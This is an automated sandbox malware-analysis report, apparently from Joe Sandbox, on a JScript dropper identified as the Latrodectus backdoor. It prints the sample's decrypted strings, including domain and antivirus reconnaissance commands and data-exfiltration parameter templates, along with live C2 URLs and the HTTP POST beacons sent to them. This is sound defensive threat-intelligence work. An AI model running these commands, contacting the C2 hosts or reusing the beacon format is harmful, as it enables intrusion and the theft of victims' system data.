Windows Analysis Report
Document_a19_79b555791-28h97348k5477-3219g9.js

Overview

General Information

Sample name:	Document_a19_79b555791-28h97348k5477-3219g9.js
Analysis ID:	1431885
MD5:	3f4ddf670c98e5b0656415286e42f730
SHA1:	cf27b8f44467cd4ab250b74caa039340ecd97a94
SHA256:	156c0afc01a5e346b95ebdb60cea9b7046ad7a61199cd63d6ad0f4ae32a576ac
Tags:	js
Infos:

Detection

Latrodectus

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

JScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Yara detected Latrodectus

C2 URLs / IPs found in malware configuration

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sleep reduction / modifications

Drops executables to the windows directory (C:\Windows) and starts them

JavaScript file contains Antivirus product strings

PE file contains section with special chars

Performs a network lookup / discovery via net view

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample has a suspicious name (potential lure to open the executable)

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Uses ipconfig to lookup or modify the Windows network settings

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the current domain controller via net

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Unidentified 111 (Latrodectus), Latrodectus	First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.	No Attribution	https://embee-research.ghost.io/phishing-domain-analysis-with-passive-dns-latrodectus/ https://exchange.xforce.ibmcloud.com/malware-analysis/guid:dab8a02f9161933bc2eff5ba4a5f8412 https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39 https://twitter.com/Myrtus0x0/status/1732997981866209550 https://www.embeeresearch.io/latrodectus-script-deobfuscation/	https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Signatures

AV Detection

Found malware configuration

Source: 6.2.rundll32.exe.187ec850000.2.unpack

Malware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}

Sample uses string decryption to hide its real strings

Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c ipconfig /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c systeminfo
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c nltest /domain_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net view /all /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c nltest /domain_trusts /all_trusts
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net view /all
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &ipconfig=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net group "Domain Admins" /domain
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c net config workstation
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /c whoami /groups
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\Windows\System32\cmd.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &systeminfo=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain_trusts=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain_trusts_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_view_all_domain=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_view_all=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &wmic=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_config_ws=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &net_wmic_av=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &whoami_group=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &proclist=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "pid":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%d",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "proc":
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s",
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "subproc": [
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &desklinks=[
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Update_%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Custom_update
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Updater
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: rundll32.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: "%s", %s %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: runnung
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: :wtfbbq
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: files/bp.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s\%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %d.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s\%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: init -zzzz="%s\%s"
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: front
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: /files/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Facial
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: !"$%&()*wp
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: .exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: POST
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: GET
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: curl/7.88.1
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: CLEARURL
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: COMMAND
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: ERROR
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: <html>
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: <!DOCTYPE
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%d.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: 12345
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &stiller=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %s%d.exe
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: LogonTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %x%x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: TimeTrigger
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: PT0H%02dM
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &mac=
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: :%02x
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: PT0S
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &computername=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: &domain=%s
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \*.dll
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: %04X%04X%04X%04X%08X%04X
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \Registry\Machine\
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: https://jarinamaers.shop/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: https://wrankaget.site/live/
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Desktop
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Startup
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Personal
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Local AppData
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: \update_data.dat
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS
Source: 6.2.rundll32.exe.187ec850000.2.unpack	String decryptor: URLS\|%d\|%s

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

6_2_000000018003BC0C

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Spreading

Performs a network lookup / discovery via net view

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain			Jump to behavior

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072AF79 FindFirstFileExW,	4_2_0072AF79
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	6_2_00000187EC85A350
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	6_2_00000187EC851A08
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEA350 FindFirstFileW,FindNextFileW,LoadLibraryW,	7_2_00000201DAAEA350
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	7_2_00000201DAAE1A08
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950A350 FindFirstFileW,FindNextFileW,LoadLibraryW,	8_2_000001A37950A350
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	8_2_000001A379501A08

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe	Network Connect: 104.21.59.82 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 172.67.136.103 443			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://jarinamaers.shop/live/
Source: Malware configuration extractor	URLs: https://wrankaget.site/live/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /live/ HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache

